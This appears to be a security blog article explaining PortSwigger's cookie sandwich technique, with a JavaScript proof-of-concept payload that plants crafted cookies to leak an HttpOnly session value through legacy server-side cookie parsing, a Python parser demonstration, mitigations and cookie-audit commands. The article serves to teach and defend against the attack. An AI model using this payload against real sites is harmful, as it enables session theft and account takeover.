Stealing HttpOnly Cookies with the Cookie Sandwich Technique

The Cookie Sandwich Technique is a method published by PortSwigger Research for reading the value of an HttpOnly cookie from an XSS context. It does not break the HttpOnly flag itself: the browser still hides the cookie from document.cookie. Instead, it abuses a mismatch between how browsers serialise the Cookie header and how some servers parse it. Attacker-controlled cookies placed before and after the HttpOnly cookie (the "sandwich") make a server-side parser that still honours the legacy RFC 2109 quoted-value syntax treat the whole run as the value of a single attacker cookie, which the application then reflects in a response the attacker's script can read.

You Should Know:

How the Cookie Sandwich Technique Works

  1. HttpOnly Cookie Limitation: Normally, HttpOnly cookies are inaccessible via JavaScript (document.cookie), so an XSS payload cannot simply read and exfiltrate the session cookie.
  2. Cookie Ordering: The browser builds the Cookie header from every cookie that matches the request, sorted by path length (longest first) and then by creation time (oldest first). An attacker who can set cookies on the site (via XSS, or a cookie-injection bug) therefore controls what appears before and after the HttpOnly cookie by choosing the `path` attribute and the order in which the cookies are created.
  3. Legacy Quoted-Value Parsing: Servers whose cookie parser still follows RFC 2109 (Apache Tomcat's LegacyCookieProcessor is the best-known example, and Python's standard http.cookies module behaves the same way) treat a value that starts with a double quote as running until the closing quote, semicolons included. The attacker's script sets three cookies:

– `$Version=1`, which switches some parsers into legacy mode.
– `param1="start` with a path longer than the session cookie's, so the browser sends it before the HttpOnly cookie.
– `param2=end"` with the same path as the session cookie, created last, so the browser sends it after the HttpOnly cookie.

  4. Reflection: The server now sees one cookie, `param1`, whose value is `start; session=<HttpOnly value>; param2=end`. If the application reflects that cookie value anywhere the attacker's script can read (an error page, an analytics parameter, a JSON response), the HttpOnly value is exposed in the response body. The leak never goes through document.cookie.

Proof of Concept (PoC) Code

The payload runs in an XSS context on the target origin. It assumes the victim's `session` cookie was set with `path=/` and that `/profile` reflects the value of the `param1` cookie somewhere in its response (the reflection point is application-specific).

// Step 1: build the sandwich. Cookies with the longer path (/profile) are sent
// before the session cookie (path=/); param2 is created last, so it is sent after it.
document.cookie = '$Version=1; path=/profile';
document.cookie = 'param1="start; path=/profile';
document.cookie = 'param2=end"; path=/';

// Step 2: request an endpoint that reflects the param1 cookie. A legacy parser reads
//   $Version=1; param1="start; session=<value>; param2=end"
// as a single cookie param1, so the HttpOnly value lands in the response body.
fetch('/profile', { credentials: 'include' })
  .then(response => response.text())
  .then(body => {
    // Step 3: read the HttpOnly value from the reflected text, never from document.cookie
    const match = body.match(/session=([^;"]+)/);
    console.log("Stolen Cookie:", match ? match[1] : "not reflected");
  });
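To show the server-side half of the mechanism, here is an added Python example (not code from the PortSwigger research or from this page). It uses Python's standard http.cookies module as the legacy, RFC 2109-style parser, a hand-written strict RFC 6265 parser for contrast (the behaviour a fixed server should have), and a small function that orders cookies the way browsers do. The cookie names param1/param2, the path /profile and the session value are made up for the demonstration.

```python
"""Cookie sandwich, server side: a legacy (RFC 2109 style) cookie parser turns
three attacker cookies plus one HttpOnly cookie into a single value.

Added example, not code from the PortSwigger research or from the page.
http.cookies.SimpleCookie honours double-quoted values, so it stands in for
the legacy parser; rfc6265_parse() is the strict parser written for contrast.
"""
from http.cookies import SimpleCookie


def browser_cookie_header(cookies):
    """Order cookies the way browsers build the Cookie header:
    longest path first, then oldest (lowest creation index) first."""
    ordered = sorted(
        enumerate(cookies),
        key=lambda item: (-len(item[1]["path"]), item[0]),
    )
    return "; ".join(f'{c["name"]}={c["value"]}' for _, c in ordered)


def legacy_parse(header):
    """Parse with http.cookies: a value starting with '"' runs to the closing
    quote, so ';' and '=' inside it are swallowed into one cookie."""
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


def rfc6265_parse(header):
    """Strict parser: every ';' ends a cookie-pair, quotes are literal bytes."""
    result = {}
    for pair in header.split(";"):
        pair = pair.strip()
        if not pair or "=" not in pair:
            continue
        name, _, value = pair.partition("=")
        result[name.strip()] = value.strip()
    return result


# Constructed scenario (hypothetical names and values). The victim's HttpOnly
# session cookie exists first (path=/). The attacker's XSS payload then creates
# three cookies: two with a longer path so they precede the session cookie,
# and one closing cookie created last so it follows it.
VICTIM_AND_ATTACKER_COOKIES = [
    {"name": "session",  "value": "s3cr3t-httponly", "path": "/"},
    {"name": "$Version", "value": "1",               "path": "/profile"},
    {"name": "param1",   "value": '"start',          "path": "/profile"},
    {"name": "param2",   "value": 'end"',            "path": "/"},
]


def sandwich_header():
    """The Cookie header the browser would send for a request to /profile."""
    return browser_cookie_header(VICTIM_AND_ATTACKER_COOKIES)


def leaked_session_value(header):
    """What the application reflects if it echoes the 'param1' cookie:
    on a legacy parser this string contains the HttpOnly session value."""
    return legacy_parse(header).get("param1")


if __name__ == "__main__":
    hdr = sandwich_header()
    print("Cookie:", hdr)
    print("legacy  parser :", legacy_parse(hdr))
    print("rfc6265 parser :", rfc6265_parse(hdr))
```

Run it and compare the two parses: the legacy parser returns no `session` cookie at all and a `param1` whose value carries the session value, while the strict parser keeps four separate cookies and leaves the stray quotes in `param1` and `param2` as literal characters.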

Mitigation Techniques

  • Parse Cookies per RFC 6265: The sandwich only works against a server-side parser that honours RFC 2109 quoted values and `$Version`. Use a cookie processor that treats every `;` as a separator and never merges across quotes (on Tomcat, do not enable the LegacyCookieProcessor), and never reflect raw cookie values into responses.
  • Keep `HttpOnly`, `Secure` and `SameSite` on Session Cookies:
    Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Strict
    These flags do not stop the sandwich by themselves, because the attacker's requests come from the site's own origin, but they still block cookie theft over plaintext and CSRF from other origins.
  • Validate `Origin` and `Referer` Headers (a CSRF defence, useful as defence in depth):
    Python Flask example
    from flask import Flask, request, abort

    app = Flask(__name__)

    @app.before_request
    def check_csrf():
        # Reject cross-origin state-changing requests; this does not stop a
        # same-origin XSS payload, which sends a matching Origin header.
        if request.method == "POST":
            if request.headers.get('Origin') != "https://trusted-domain.com":
                abort(403)

  • Implement Content Security Policy (CSP) to make the initial XSS harder. `'unsafe-inline'` must not appear in `script-src`, since it would let the injected inline script run; a working baseline is:

    Content-Security-Policy: default-src 'self'; script-src 'self';

Linux Command to Check HttpOnly Cookies in Traffic

Set-Cookie headers appear in responses, so the BPF filter matches packets whose payload starts with "HTTP" (0x48545450) and the second grep lists cookies set without HttpOnly. Only plaintext port 80 traffic is visible this way; TLS traffic has to be inspected at a proxy or with a TLS key log.

tcpdump -i eth0 -A -s 0 'tcp port 80 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x48545450)' | grep -i "Set-Cookie:" | grep -vi "HttpOnly"

Windows Command to Audit Cookies

Lists every Set-Cookie header in a saved log that does not carry the HttpOnly flag:

Get-Content .\web_traffic.log | Select-String -Pattern "Set-Cookie:" | Where-Object { $_.Line -notmatch "HttpOnly" }
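The two audit commands above only grep for the header. The following added Python example (not from the original page) performs the same audit offline and additionally flags cookie values that begin with a double quote, the footprint a cookie sandwich leaves in server logs. The log lines are constructed for the demonstration.

```python
"""Audit Set-Cookie headers for missing HttpOnly/Secure/SameSite flags and for
values that start with a double quote (the opening half of a cookie sandwich).

Added example, not part of the original page. The function works on any text
that contains 'Set-Cookie:' lines (tcpdump -A output, proxy logs, HAR exports).
"""
import re

# Header name, cookie name, then everything up to the end of the line.
SET_COOKIE = re.compile(
    r"set-cookie:\s*(?P<name>[^=;\s]+)=(?P<rest>[^\r\n]*)", re.IGNORECASE
)

REQUIRED_FLAGS = ("httponly", "secure", "samesite")

# Constructed sample: one well-flagged session cookie, one tracking cookie
# without HttpOnly/SameSite, and one cookie whose value opens a quote.
SAMPLE_LOG = """\
HTTP/1.1 200 OK
Set-Cookie: session=abc123; Path=/; HttpOnly; Secure; SameSite=Strict
Set-Cookie: tracking=xyz; Path=/; Secure
Set-Cookie: param1="start; Path=/profile
Content-Type: text/html
"""


def audit_set_cookie(text):
    """Return one finding per Set-Cookie header: cookie name, the list of
    required flags it lacks, and whether its value starts with a quote."""
    findings = []
    for m in SET_COOKIE.finditer(text):
        parts = m.group("rest").split(";")
        value = parts[0].strip()
        # Attribute names only (Path=/ -> path, HttpOnly -> httponly).
        flags = {a.strip().lower().split("=")[0] for a in parts[1:]}
        findings.append({
            "name": m.group("name"),
            "missing": [f for f in REQUIRED_FLAGS if f not in flags],
            "quoted_value": value.startswith('"'),
        })
    return findings


if __name__ == "__main__":
    for finding in audit_set_cookie(SAMPLE_LOG):
        print(finding)
```

Feed it `tcpdump -A` output or an exported HAR file: any finding with a non-empty `missing` list or `quoted_value` set to True deserves a look, the latter because a legitimately issued cookie almost never starts with an unbalanced quote.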

What Undercode Say

The Cookie Sandwich Technique highlights how even HttpOnly protections can be bypassed under specific conditions. Security teams must:
– Monitor cookie behaviors in browser updates.
– Combine defenses (RFC 6265 cookie parsing, SameSite, CSP, CSRF tokens).
– Audit applications for unexpected cookie interactions, in particular places where cookie values are reflected.

Expected Output:

A security report detailing cookie manipulation risks and recommended hardening steps.

Prediction

Future browser updates may introduce stricter cookie handling, but attackers will likely find new edge cases. Proactive security testing remains critical.

Reference: PortSwigger Research, "Stealing HttpOnly cookies with the cookie sandwich technique"

Reported By: Devansh Batham – Hackers Feeds